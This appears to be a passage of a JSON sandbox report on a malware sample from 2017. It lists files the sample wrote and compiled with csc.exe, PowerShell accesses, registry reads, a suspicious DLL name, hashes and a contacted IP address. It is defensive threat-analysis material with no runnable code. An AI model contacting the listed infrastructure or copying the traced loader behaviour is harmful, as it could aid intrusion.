{ "analysis_details": { "creation_time": "2017-10-24 19:37 (UTC+2)", "execution_successful": true, "number_of_processes": 10, "reputation_enabled": true, "termination_reason": "timeout", "type": "analysis_details", "version": 2, "vm_analysis_duration_time": "00:02:38" }, "artifacts": { "files": [ { "filename": "C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config", "hashes": [], "norm_filename": "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\config\\machine.config", "operations": [ "read", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\Desktop\\Logo.cs", "hashes": [ { "md5_hash": "667a8968a36880dc4147d2ce00c64b30", "sha1_hash": "48233228f9babdd3bcac5b85d5ae258f91204f7e", "sha256_hash": "8aea15951d21f30f44a8d7499472b62473203959659eeb2b9059b64698deacfd", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\aetadzjz\\desktop\\logo.cs", "operations": [ "read", "access", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\91rxrejg.tmp", "hashes": [ { "md5_hash": "d41d8cd98f00b204e9800998ecf8427e", "sha1_hash": "da39a3ee5e6b4b0d3255bfef95601890afd80709", "sha256_hash": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\temp\\91rxrejg.tmp", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\91rxrejg.0.cs", "hashes": [ { "md5_hash": "3992ea6c0751d769815a98c4cffcadce", "sha1_hash": "6ba244d7eb6a6facd2b4c4e946e26987d2336e8b", "sha256_hash": "b12a34c289c97db64f4267e5c67b70f4fefedfe28ae6527e7721a6ef3e4e0adc", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\temp\\91rxrejg.0.cs", "operations": [ "access", "write" ], "type": "file_artifact", "version": 1 }, { "filename": 
"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\91rxrejg.cmdline", "hashes": [ { "md5_hash": "8d42a6a6ddda3cb8546ef4cb888dbfa8", "sha1_hash": "2024365b4311bc93867119ceee7c876683fef607", "sha256_hash": "f0d80af454b0e9060f13236c0827a4df63d61ac4964a174c999f4aa2895ff00e", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\temp\\91rxrejg.cmdline", "operations": [ "access", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\91rxrejg.out", "hashes": [ { "md5_hash": "51bfb6f473aa25324ee1ed9830ca806e", "sha1_hash": "f1fae130030df5b4dff15ed820ca35665886ea98", "sha256_hash": "60a57285c3ccbfa3f03f050681e54c27de4ef1766fe6151104a919b7f7c8fa2e", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\temp\\91rxrejg.out", "operations": [ "access", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\91rxrejg.err", "hashes": [ { "md5_hash": "d41d8cd98f00b204e9800998ecf8427e", "sha1_hash": "da39a3ee5e6b4b0d3255bfef95601890afd80709", "sha256_hash": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\temp\\91rxrejg.err", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "STD_INPUT_HANDLE", "hashes": [], "norm_filename": "std_input_handle", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\91rxrejg.pdb", "hashes": [], "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\temp\\91rxrejg.pdb", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\Desktop\\__Sn.cs", "hashes": [], "norm_filename": "c:\\users\\aetadzjz\\desktop\\__sn.cs", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": 
"C:\\Windows\\system32\\com\\SOAPAssembly", "hashes": [], "norm_filename": "c:\\windows\\system32\\com\\soapassembly", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\system32\\com", "hashes": [], "norm_filename": "c:\\windows\\system32\\com", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\system32", "hashes": [], "norm_filename": "c:\\windows\\system32", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows", "hashes": [], "norm_filename": "c:\\windows", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\Desktop\\http100www4samyrai777m4p-host4in0t0tp4php2thread90.dll", "hashes": [], "norm_filename": "c:\\users\\aetadzjz\\desktop\\http100www4samyrai777m4p-host4in0t0tp4php2thread90.dll", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.config", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\root\\office16\\winword.config", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\csc.exe", "hashes": [], "norm_filename": "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\csc.exe", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "STD_OUTPUT_HANDLE", "hashes": [], "norm_filename": "std_output_handle", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "STD_ERROR_HANDLE", "hashes": [], "norm_filename": "std_error_handle", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", "hashes": [], "norm_filename": "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml", "operations": [ "read", "access" ], "type": 
"file_artifact", "version": 1 }, { "filename": "C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", "hashes": [], "norm_filename": "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\SYSteM32\\windowspOweRSHeLL\\V1.0\\PoWErSHELL.config", "hashes": [], "norm_filename": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0", "hashes": [], "norm_filename": "c:\\windows\\system32\\windowspowershell\\v1.0", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", "hashes": [], "norm_filename": "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml", "operations": [ "access", "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", "hashes": [], "norm_filename": "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml", "operations": [ "access", "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", "hashes": [], "norm_filename": "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", "hashes": [], "norm_filename": "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": 
"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", "hashes": [], "norm_filename": "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", "hashes": [], "norm_filename": "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", "hashes": [], "norm_filename": "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", "hashes": [], "norm_filename": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", "hashes": [], "norm_filename": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", "hashes": [], "norm_filename": "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz", "hashes": [], "norm_filename": "c:\\users\\aetadzjz", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\", "hashes": [], "norm_filename": "c:", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\Desktop", "hashes": [], "norm_filename": "c:\\users\\aetadzjz\\desktop", "operations": [ 
"access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users", "hashes": [], "norm_filename": "c:\\users", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", "hashes": [], "norm_filename": "c:\\windows\\system32\\windowspowershell\\v1.0\\profile.ps1", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", "hashes": [], "norm_filename": "c:\\windows\\system32\\windowspowershell\\v1.0\\microsoft.powershell_profile.ps1", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\Documents\\WindowsPowerShell\\profile.ps1", "hashes": [], "norm_filename": "c:\\users\\aetadzjz\\documents\\windowspowershell\\profile.ps1", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", "hashes": [], "norm_filename": "c:\\users\\aetadzjz\\documents\\windowspowershell\\microsoft.powershell_profile.ps1", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "CONOUT$", "hashes": [], "norm_filename": "conout$", "operations": [ "access", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Roaming\\result.exex", "hashes": [ { "md5_hash": "d41d8cd98f00b204e9800998ecf8427e", "sha1_hash": "da39a3ee5e6b4b0d3255bfef95601890afd80709", "sha256_hash": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\aetadzjz\\appdata\\roaming\\result.exex", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\system32\\taskkill.exe", "hashes": [], "norm_filename": "c:\\windows\\system32\\taskkill.exe", "operations": [ "access" ], 
"type": "file_artifact", "version": 1 } ], "ips": [ { "ip_address": "185.211.244.133", "type": "ip_address_artifact", "version": 1 } ], "mutexes": [ { "mutex_name": "Global\\.net clr networking", "operations": [ "access", "delete" ], "type": "mutex_artifact", "version": 1 }, { "mutex_name": "Local\\!PrivacIE!SharedMemory!Mutex", "operations": [ "access" ], "type": "mutex_artifact", "version": 1 } ], "registry": [ { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\Application", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\Application\\COM+ SOAP Services", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\HardwareEvents", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\HardwareEvents\\COM+ SOAP Services", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\Internet Explorer", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\Internet Explorer\\COM+ SOAP Services", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\Key Management Service", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\Key 
Management Service\\COM+ SOAP Services", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\Media Center", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\Media Center\\COM+ SOAP Services", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\OAlerts", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\OAlerts\\COM+ SOAP Services", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\Security", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\System", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\System\\COM+ SOAP Services", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\Windows PowerShell", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\Windows PowerShell\\COM+ SOAP Services", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": 
"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\.NET CLR Networking\\Performance", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\.net clr networking\\Performance", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_CLASSES_ROOT\\clsid\\{25336920-03f9-11cf-8fd0-00aa00686f13}\\InProcServer32", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\Internet Explorer\\Main\\FeatureControl", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\Internet Explorer\\Main\\FeatureControl", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": 
"HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_CSS_DATA_RESPECTS_XSS_ZONE_SETTING_KB912120", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_CSS_DATA_RESPECTS_XSS_ZONE_SETTING_KB912120", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_EXTERNAL_STYLE_SHEET_FIX_FOR_SMARTNAVIGATION_KB926131", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_EXTERNAL_STYLE_SHEET_FIX_FOR_SMARTNAVIGATION_KB926131", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_ARIA_SUPPORT", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_ARIA_SUPPORT", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_LEGACY_DISPPARAMS", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_LEGACY_DISPPARAMS", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_PRIVATE_FONT_SETTING", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Internet 
Explorer\\Main\\FeatureControl\\FEATURE_PRIVATE_FONT_SETTING", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_CSS_SHOW_HIDE_EVENTS", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_CSS_SHOW_HIDE_EVENTS", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_DISPLAY_NODE_ADVISE_KB833311", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_DISPLAY_NODE_ADVISE_KB833311", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_ALLOW_EXPANDURI_BYPASS", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_ALLOW_EXPANDURI_BYPASS", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_BODY_SIZE_IN_EDITABLE_IFRAME_KB943245", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_BODY_SIZE_IN_EDITABLE_IFRAME_KB943245", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_DATABINDING_SUPPORT", "type": "registry_artifact", "version": 1 
}, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_DATABINDING_SUPPORT", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_ENFORCE_BSTR", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_ENFORCE_BSTR", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_ENABLE_DYNAMIC_OBJECT_CACHING", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_ENABLE_DYNAMIC_OBJECT_CACHING", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_LEGACY_TOSTRING_IN_COMPATVIEW", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_LEGACY_TOSTRING_IN_COMPATVIEW", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_ENABLE_OM_SCREEN_ORIGIN_DISPLAY_PIXELS", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_ENABLE_OM_SCREEN_ORIGIN_DISPLAY_PIXELS", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Internet 
Explorer\\Main\\FeatureControl\\FEATURE_RESTRICT_CRASH_RECOVERY_SAVE_KB978454", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_RESTRICT_CRASH_RECOVERY_SAVE_KB978454", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_CLEANUP_AT_FLS", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_CLEANUP_AT_FLS", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_MANAGE_SCRIPT_CIRCULAR_REFS", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_MANAGE_SCRIPT_CIRCULAR_REFS", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_DOCUMENT_COMPATIBLE_MODE", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_DOCUMENT_COMPATIBLE_MODE", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_WEBOC_DOCUMENT_ZOOM", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_WEBOC_DOCUMENT_ZOOM", "type": "registry_artifact", "version": 1 }, { 
"operations": [ "access", "read" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\PageSetup", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_XSSFILTER", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_XSSFILTER", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_SHOW_FAILED_CONNECT_CONTENT_KB942615", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_SHOW_FAILED_CONNECT_CONTENT_KB942615", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_MSHTML_AUTOLOAD_IEFRAME", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_MSHTML_AUTOLOAD_IEFRAME", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_MIME_TREAT_IMAGE_AS_AUTHORITATIVE", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_MIME_TREAT_IMAGE_AS_AUTHORITATIVE", "type": "registry_artifact", "version": 1 }, { "operations": [ "read" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer", "type": 
